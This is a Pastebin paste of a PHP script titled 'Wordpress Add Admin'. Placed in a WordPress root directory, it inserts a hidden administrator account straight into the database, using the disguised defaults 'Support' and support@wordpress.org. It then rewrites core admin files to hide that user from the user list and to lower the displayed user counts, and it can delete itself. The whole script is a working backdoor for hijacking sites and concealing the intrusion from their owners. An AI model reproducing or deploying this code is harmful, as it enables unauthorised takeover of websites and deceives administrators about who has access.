Advertisement
willysec_id

Wordpress Add Admin

Apr 24th, 2024
919
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.68 KB | Cybersecurity | 0 0
  1. <?php
  2. //Place this file to rootdir of wordpress cms
  3. header("Content-Type: text/html;charset=utf-8");
  4. ini_set('max_execution_time', '0');
  5. error_reporting(E_ALL);
  6. ini_set('display_errors', '1');
  7. require __DIR__ . '/wp-load.php';
  8. $con = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
  9. if(mysqli_connect_errno($con)){die("Failed to connect to MySQL: ".mysqli_connect_error());}
  10. mysqli_query($con, "SET NAMES ".DB_CHARSET);
  11. $notice = '';
  12. $user_name = isset($_POST['user_name']) ? $_POST['user_name'] : '';
  13. $pwd = isset($_POST['pwd']) ? $_POST['pwd'] : '';
  14. $email = isset($_POST['email']) ? $_POST['email'] : '';
  15.     if($_POST['action'] == 'del'){
  16.         $file_path = __DIR__.'/wp-add.php';
  17.         if(file_exists($file_path)){
  18.             unlink($file_path);
  19.         }
  20.     }
  21. if($user_name != '' && $pwd != '' && $email != ''){    
  22.     if(!function_exists('wp_hash_password')){
  23.         function wp_hash_password($password){
  24.              global $wp_hasher;
  25.             if(empty($wp_hasher)){
  26.                 require_once ABSPATH . WPINC . '/class-phpass.php';
  27.                  $wp_hasher = new PasswordHash( 8, true );
  28.             }
  29.             return $wp_hasher->HashPassword( trim( $password ) );
  30.          }
  31.      }
  32.  
  33.      $user_id = 0;
  34.     $check = mysqli_query($con, "SELECT * FROM `".$table_prefix."users` WHERE `user_login` = '".addslashes($user_name)."' OR `user_email` = '".addslashes($email)."'");
  35.     if(mysqli_num_rows($check) > 0){
  36.          $notice = '该用户名或邮箱已被使用过。';
  37.         $row = mysqli_fetch_array($check, MYSQLI_ASSOC);
  38.          $user_id = $row['ID'];
  39.     }else{
  40.          $hash = wp_hash_password($pwd);
  41.         mysqli_query($con, "INSERT INTO `".$table_prefix."users`  (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_registered`, `user_status`, `display_name`) VALUES ('".addslashes($user_name)."', '".addslashes($hash)."', '".addslashes($user_name)."', '".addslashes($email)."', '2020-06-14 00:00:00', 0, '".addslashes($user_name)."')");
  42.         $user_id = mysqli_insert_id($con);
  43.          if($user_id > 0){
  44.              $code = 'a:1:{s:13:"administrator";b:1;}';
  45.              mysqli_query($con, "INSERT INTO `".$table_prefix."usermeta`  (`user_id`, `meta_key`, `meta_value`) VALUES (".$user_id.", 'nickname', '".addslashes($user_name)."'), (".$user_id.", 'first_name', ''), (".$user_id.", 'last_name', ''), (".$user_id.", 'description', ''), (".$user_id.", 'rich_editing', 'true'), (".$user_id.", 'syntax_highlighting', 'true'), (".$user_id.", 'comment_shortcuts', 'false'), (".$user_id.", 'admin_color', 'fresh'), (".$user_id.", 'use_ssl', 0), (".$user_id.", 'show_admin_bar_front', 'true'), (".$user_id.", 'locale', ''), (".$user_id.", '".$table_prefix."capabilities', '".$code."'), (".$user_id.", '".$table_prefix."user_level', 10)");
  46.              if(mysqli_insert_id($con) > 0){
  47.                  $notice = '用户添加成功';
  48.              }else{
  49.                 $notice = '用户添加失败';
  50.             }
  51.         }else{
  52.             $notice = '用户添加失败';
  53.          }
  54.     }
  55.  
  56.     if($user_id > 0){
  57.         $code = '<style>#user-'.$user_id.'{display:none;}</style>';
  58.         $path = ABSPATH.'wp-admin/admin-header.php';
  59.          if(file_exists($path)){
  60.             $temp = file_get_contents($path);
  61.              if(strstr($temp, $code)){
  62.                 $notice .= ' Style 代码已添加过。';
  63.             }else{
  64.                 if(strstr($temp, '<div id="wpbody')){
  65.                     $fp = fopen($path, "wb");
  66.                     fwrite($fp, str_replace('<div id="wpbody', $code.'<div id="wpbody', $temp));
  67.                    fclose($fp);
  68.                     $notice .= ' Style 代码添加成功。';
  69.                 }else{
  70.                     $notice .= ' Style 代码添加失败。';
  71.                 }
  72.             }
  73.         }else{
  74.             $notice .= ' Style 文件查找失败。';
  75.         }
  76.  
  77.          $path = ABSPATH.'wp-admin/includes/class-wp-users-list-table.php';
  78.          if(file_exists($path)){
  79.              $temp = file_get_contents($path);
  80.             $status = 0;
  81.             if(strstr($temp, 'number_format_i18n( $total_users-1') && (strstr($temp, 'number_format_i18n( $avail_roles[ $this_role ]-1') || strstr($temp, 'number_format_i18n( $avail_roles[$this_role]-1')) ){
  82.                 $notice .= ' 隐藏数字 代码已添加过。';
  83.             }else{
  84.                  if(!strstr($temp, 'number_format_i18n( $total_users-1')){
  85.                     $temp = str_replace('number_format_i18n( $total_users', 'number_format_i18n( $total_users-1', $temp);
  86.                 }
  87.                 if(!strstr($temp, 'number_format_i18n( $avail_roles[$this_role]-1')){
  88.                      $temp = str_replace('number_format_i18n( $avail_roles[$this_role]', 'number_format_i18n( $avail_roles[$this_role]-1', $temp);
  89.                 }
  90.                 if(!strstr($temp, 'number_format_i18n( $avail_roles[ $this_role ]-1')){
  91.                     $temp = str_replace('number_format_i18n( $avail_roles[ $this_role ]', 'number_format_i18n( $avail_roles[ $this_role ]-1', $temp);
  92.                 }
  93.                $fp = fopen($path, "wb");
  94.                fwrite($fp, $temp);
  95.                fclose($fp);
  96.                  $notice .= ' 隐藏数字 代码添加成功。';                
  97.              }
  98.          }else{
  99.              $notice .= ' 隐藏数字 文件查找失败。';
  100.         }
  101.    }
  102.  
  103. }
  104.  
  105.  
  106. $sql = mysqli_query($con , "SELECT * FROM `".$table_prefix."users`");
  107. $total = mysqli_num_rows($sql);
  108. if($total > 0){
  109.     $list = '';
  110.     while($row = mysqli_fetch_array($sql, MYSQLI_ASSOC)){
  111.         $list .= '<tr><td>'.$row['ID'].'</td><td>'.$row['user_login'].'</td><td>'.$row['user_email'].'</td><td>'.$row['user_nicename'].'</td><td>'.$row['user_registered'].'</td></tr>';
  112.     }
  113. }
  114. mysqli_close($con);
  115. ?>
  116. <!DOCTYPE html>
  117. <html lang="zh-CN">
  118. <head>
  119. <title>Add WordPress Admin</title>
  120. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  121. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  122. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  123. <meta name="robots" content="noindex, nofollow">
  124. <meta name="renderer" content="webkit|ie-comp|ie-stand">
  125. <style>body{background-color:#F2F2F2;}.notice{background-color:#FFFF00;color:#0074BF;padding-left:10px;}.table{border-collapse:collapse;border-spacing:0;width:90%;margin:30px auto;}
  126. .table td{word-break:break-all;max-width:300px;background-color:#FFF;}
  127. .table th, .table td{border: 1px solid #ddd;padding:8px;}
  128. .table tbody > tr:nth-child(2n+1) > td, .table tbody > tr:nth-child(2n+1) > th {background-color:#f9f9f9;}</style>
  129. <script src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
  130. </head>
  131. <body>
  132. <table class="table">
  133.   <tr>
  134.     <td colspan="5" align="left"><div class="notice"><?php echo $notice;?></div></td>
  135.   </tr>
  136.   <tr>
  137.     <td colspan="5" align="left">【 添加新管理员 】</td>
  138.   </tr>
  139.   <tr>
  140.     <td colspan="5" align="left"><form action="" method="post" name="form">用户名:<input type="text" value="Support" name="user_name"> 密码:<input type="text" value="vFELLmUMgJJdQW4S" name="pwd"> 邮箱:<input type="text" value="support@wordpress.org" name="email"> <input type="submit"></form></td>
  141.   </tr>
  142.   <tr>
  143.     <td colspan="5" align="left"><form action="" method="post" name="form"><input type='hidden' name="action" value='del'><input type="submit" value="删除文件"></form></td>
  144.   </tr>
  145.   <tr>
  146.     <td colspan="5" align="left">【 用户列表:<?php echo $total;?>位 】</td>
  147.   </tr>
  148.   <?php if($total > 0){?>
  149.   <tr>
  150.     <td>ID</td>
  151.     <td>用户名</td>
  152.     <td>邮箱</td>
  153.     <td>昵称</td>
  154.     <td>注册时间</td>
  155.   </tr>
  156.   <?php echo $list;}?>
  157. </table>
  158. </body>
  159. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement